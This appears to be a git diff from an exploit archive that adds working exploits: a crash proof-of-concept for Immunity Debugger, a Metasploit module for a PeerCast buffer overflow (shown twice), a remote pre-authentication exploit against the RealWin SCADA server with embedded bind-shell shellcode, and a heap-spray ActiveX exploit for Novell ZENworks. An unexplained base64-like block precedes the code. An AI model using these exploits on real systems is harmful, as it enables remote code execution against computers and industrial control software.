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
0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA=

46
platforms/windows/dos/32435.c Executable file
View file

@ -0,0 +1,46 @@
/* Filename : Crash_POC.cpp
# Exploit Title: [title]
# Date: 20 March 2014
# Exploit Author: Veysel HATAS (vhatas@gmail.com) - Web Page : www.binarysniper.net
# Vendor Homepage: https://www.immunityinc.com/
# Software Link: https://www.immunityinc.com/products-immdbg.shtml
# Version: 1.85
# Tested on: WinXP, Win7
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int g_Count;
void foo(char *data);
int main(int argc, char* argv[])
{
g_Count = 0;
foo(argv[1]);
return 0;
}
void foo(char *data)
{
char salla[10];
printf("Deneme - %d\n", g_Count);
g_Count++;
if (g_Count == 510){
strcpy(salla, data);
}
try{
foo(data);
}
catch(int e){
printf("Error code is : %d", e);
}
}

238
platforms/windows/remote/1626.pm
View file

@ -1,119 +1,119 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::peercast_url_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 7144],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20\x0d",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in PeerCast <= v0.1216.
The vulnerability is caused due to a boundary error within the
handling of URL parameters.
}),
'Refs' =>
[
['OSVDB', '23777'],
['BID', '17040'],
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
],
'Targets' =>
[
['Windows 2000 English SP0-SP4', 0x75023360 ],
['Windows 2003 English SP0-SP1', 0x77d099e3 ],
['Windows XP English SP0/SP1', 0x77dbfa2c],
['Windows XP English SP0/SP2', 0x77dc12b8],
],
'Keys' => ['peercast'],
'DisclosureDate' => 'March 8 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $pattern = Pex::Text::AlphaNumText(1024);
# Return to EDI (offset 812)
substr($pattern, 768, 4, pack('V', $target->[1]));
# Jump back to the shellcode
substr($pattern, 812, 5, "\xe9".pack("V", -517));
# Insert he payload at offset 300 to avoid corruption
substr($pattern, 300, length($shellcode), $shellcode);
my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# milw0rm.com [2006-03-30]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::peercast_url_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 7144],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20\x0d",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in PeerCast <= v0.1216.
The vulnerability is caused due to a boundary error within the
handling of URL parameters.
}),
'Refs' =>
[
['OSVDB', '23777'],
['BID', '17040'],
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
],
'Targets' =>
[
['Windows 2000 English SP0-SP4', 0x75023360 ],
['Windows 2003 English SP0-SP1', 0x77d099e3 ],
['Windows XP English SP0/SP1', 0x77dbfa2c],
['Windows XP English SP0/SP2', 0x77dc12b8],
],
'Keys' => ['peercast'],
'DisclosureDate' => 'March 8 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $pattern = Pex::Text::AlphaNumText(1024);
# Return to EDI (offset 812)
substr($pattern, 768, 4, pack('V', $target->[1]));
# Jump back to the shellcode
substr($pattern, 812, 5, "\xe9".pack("V", -517));
# Insert he payload at offset 300 to avoid corruption
substr($pattern, 300, length($shellcode), $shellcode);
my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n";
$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}
1;
# milw0rm.com [2006-03-30]

214
platforms/windows/remote/32426.c Executable file
View file

@ -0,0 +1,214 @@
source: http://www.securityfocus.com/bid/31418/info
DATAC RealWin SCADA server is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the context of the affected application. This may facilitate the complete compromise of affected computers. Failed exploit attempts may result in a denial-of-service condition.
RealWin SCADA server 2.0 is affected; other versions may also be vulnerable.
////////////////////////////////////////////////////////////////////
//// DATAC RealWin 2.0 SCADA Software - Remote PreAuth Exploit -.
//// --------------------------------------------------------
//// This code can only be used for personal study
//// and/or research purposes on even days.
////
//// The author is not responsible for any illegal usage.
//// So if you flood your neighborhood that's your f******* problem =)
//// ---------------
//// Note
//// ---------------
//// ## The exploit has been tested against a build that seems pretty old.
//// ## Therefore this flaw may be not reproducible on newer versions.
////
//// http://www.dataconline.com
//// http://www.realflex.com/download/form.php
////
//// Ruben Santamarta www.reversemode.com
////
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"wsock32.lib")
#define REALWIN_PORT 910
#define PACKET_HEADER_MAGIC 0x67542310
#define EXPLOIT_LEN 0x810
#define PING_LEN 0x200
#define FUNC_INFOTAG_SET_CONTROL 0x5000A
#define FUNC_PING 0x70001
typedef struct {
const char *szTarget;
ULONG_PTR retAddr;
} TARGET;
TARGET targets[] = {
{ "Windows 2000 SP4 [ES]", 0x779D4F6A}, // call esp - oleaut32.dll
{ "Windows 2000 SP4 [EN]", 0x77E3C256 }, // jmp esp - user32.dll
{ "Windows XP SP2 [EN]", 0x7C914393 }, // call esp - ntdll.dll
{ "Windows XP SP2 [ES]", 0x7711139B}, // call esp - oleaut32.dll
{ NULL,0xFFFFFFFF}
};
int main(int argc, char* argv[])
{
WSADATA ws;
SOCKET tcp_socket, tcp_ping;
char bBuffer[0x10] = {0};
struct sockaddr_in peer;
char *pExploitPacket = NULL;
char *pPingPacket = NULL;
ULONG_PTR uFixed;
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"
"\xd8\xfb\x1b\x83\xeb\xfc\xe2\xf4\x59\xb2\x10\x56\x4d\x21\x04\xe4"
"\x5a\xb8\x70\x77\x81\xfc\x70\x5e\x99\x53\x87\x1e\xdd\xd9\x14\x90"
"\xea\xc0\x70\x44\x85\xd9\x10\x52\x2e\xec\x70\x1a\x4b\xe9\x3b\x82"
"\x09\x5c\x3b\x6f\xa2\x19\x31\x16\xa4\x1a\x10\xef\x9e\x8c\xdf\x33"
"\xd0\x3d\x70\x44\x81\xd9\x10\x7d\x2e\xd4\xb0\x90\xfa\xc4\xfa\xf0"
"\xa6\xf4\x70\x92\xc9\xfc\xe7\x7a\x66\xe9\x20\x7f\x2e\x9b\xcb\x90"
"\xe5\xd4\x70\x6b\xb9\x75\x70\x5b\xad\x86\x93\x95\xeb\xd6\x17\x4b"
"\x5a\x0e\x9d\x48\xc3\xb0\xc8\x29\xcd\xaf\x88\x29\xfa\x8c\x04\xcb"
"\xcd\x13\x16\xe7\x9e\x88\x04\xcd\xfa\x51\x1e\x7d\x24\x35\xf3\x19"
"\xf0\xb2\xf9\xe4\x75\xb0\x22\x12\x50\x75\xac\xe4\x73\x8b\xa8\x48"
"\xf6\x8b\xb8\x48\xe6\x8b\x04\xcb\xc3\xb0\xea\x47\xc3\x8b\x72\xfa"
"\x30\xb0\x5f\x01\xd5\x1f\xac\xe4\x73\xb2\xeb\x4a\xf0\x27\x2b\x73"
"\x01\x75\xd5\xf2\xf2\x27\x2d\x48\xf0\x27\x2b\x73\x40\x91\x7d\x52"
"\xf2\x27\x2d\x4b\xf1\x8c\xae\xe4\x75\x4b\x93\xfc\xdc\x1e\x82\x4c"
"\x5a\x0e\xae\xe4\x75\xbe\x91\x7f\xc3\xb0\x98\x76\x2c\x3d\x91\x4b"
"\xfc\xf1\x37\x92\x42\xb2\xbf\x92\x47\xe9\x3b\xe8\x0f\x26\xb9\x36"
"\x5b\x9a\xd7\x88\x28\xa2\xc3\xb0\x0e\x73\x93\x69\x5b\x6b\xed\xe4"
"\xd0\x9c\x04\xcd\xfe\x8f\xa9\x4a\xf4\x89\x91\x1a\xf4\x89\xae\x4a"
"\x5a\x08\x93\xb6\x7c\xdd\x35\x48\x5a\x0e\x91\xe4\x5a\xef\x04\xcb"
"\x2e\x8f\x07\x98\x61\xbc\x04\xcd\xf7\x27\x2b\x73\x4a\x16\x1b\x7b"
"\xf6\x27\x2d\xe4\x75\xd8\xfb\x1b";
int i,c;
system("cls");
printf("\n\t\t- DATAC RealWin 2.0 SCADA Software -\n");
printf("\tProtocol Command INFOTAG/SET_CONTROL Stack Overflow\n");
printf("\nRuben Santamarta - reversemode.com \n\n");
if( argc < 3 )
{
printf("\nusage: exploit.exe ip TargetNumber");
printf("\n\nexample: exploit 192.168.1.44 1\n\n");
for( i = 0; targets[i].szTarget; i++ )
{
printf("\n[ %d ] - %s", i, targets[i].szTarget);
}
printf("\n");
exit(0);
}
WSAStartup(0x0202,&ws);
peer.sin_family = AF_INET;
peer.sin_port = htons( REALWIN_PORT );
peer.sin_addr.s_addr = inet_addr( argv[1] );
tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
{
printf("\n[!!] Host unreachable :( \n\n");
exit(0);
}
pExploitPacket = (char*) calloc( EXPLOIT_LEN, sizeof(char) );
pPingPacket = (char*) calloc( PING_LEN, sizeof(char) );
memset( (void*)pExploitPacket, 0x90, EXPLOIT_LEN);
memset( (void*)pPingPacket, 0x90, PING_LEN);
uFixed = targets[atoi(argv[2])].retAddr;
for( i=0x0; i< 0xbe; i++)
{
*( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + i*sizeof(ULONG_PTR) +2 ) ) = uFixed;
}
// Bypass silly things.
*( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + 0xbe*sizeof(ULONG_PTR) +2 ) ) = 0x404040;
// MAGIC_HEADER
*( ( ULONG_PTR* ) pExploitPacket ) = PACKET_HEADER_MAGIC;
//Payload Length
*( ( ULONG_PTR* ) pExploitPacket + 1 ) = 0x800;
//MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL)
*( (ULONG_PTR*)(( BYTE*) pExploitPacket + 10 ) ) = FUNC_INFOTAG_SET_CONTROL;
//First Parameter
*( (ULONG_PTR*)(( BYTE*) pExploitPacket + 14 ) ) = 0x4; // Internal Switch
//Mark
*( (ULONG_PTR*)(( BYTE*) pExploitPacket + 44 ) ) = 0xDEADBEEF; // Our marker
memcpy( (void*)((char*)pExploitPacket + EXPLOIT_LEN - sizeof(scode))
,scode
,sizeof(scode)-1);
send(tcp_socket, pExploitPacket, EXPLOIT_LEN, 0 );
printf("[+] Exploit packet sent...now checking host availability\n");
// MAGIC_HEADER
*( ( ULONG_PTR* ) pPingPacket ) = PACKET_HEADER_MAGIC;
//Payload Length
*( ( ULONG_PTR* ) pPingPacket + 1 ) = 0x20;
//MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL)
*( (ULONG_PTR*)(( BYTE*) pPingPacket + 10 ) ) = FUNC_PING;
//First Parameter
*( (ULONG_PTR*)(( BYTE*) pPingPacket + 14 ) ) = 0x1; // whatever
//Mark
*( (ULONG_PTR*)(( BYTE*) pPingPacket + 44 ) ) = 0xDEADBEEF; //Our marker
tcp_ping = socket(AF_INET, SOCK_STREAM, 0);
if ( connect(tcp_ping, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
{
printf("\n[!!] Host died, long live to the Host! \n\n");
exit(0);
}
i = recv(tcp_ping, bBuffer, 0x8, 0 );
if( i )
{
printf("[+] The host is up and running\n\t:: %d bytes received: ",i);
for( c = 0; c<i; c++)
printf("%02X ", (unsigned char)bBuffer[c]);
printf("\n");
}else {
printf("\n[!!] Host died, long live to the Host! \n\n");
}
closesocket(tcp_ping);
closesocket(tcp_socket);
Sleep(1000);
printf("\n[+] Try: telnet %s 4444\n\n",argv[1]);
WSACleanup();
return 0;
}

10
platforms/windows/remote/32429.html Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31435/info
Novell ZENworks Desktop Management ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
ZENworks Desktop Management 6.5 is vulnerable; other versions may also be affected.
< html> < head> < title>Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC < /head> < body> < script> var buffa1 = unescape("%uce90%u08bc") do { buffa1 += buffa1; } while (buffa1.length < 0x900000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x1500000); buffa1 += buffa2; buffa1 += unescape("%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); < /script> < object id="victim" classid="clsid:0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"> < /object> < script language="vbscript"> appName = String(300, "A") + "?????" victim.CanUninstall appName < /script> < /body> < /html>